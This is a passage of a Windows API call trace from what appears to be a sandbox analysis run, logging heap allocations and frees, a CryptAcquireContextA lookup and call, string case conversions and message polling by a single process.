[0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0267.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0267.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0267.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.955] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0267.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3618 [0267.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0267.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0267.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.956] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3618 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.957] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.961] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.962] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.962] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.964] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 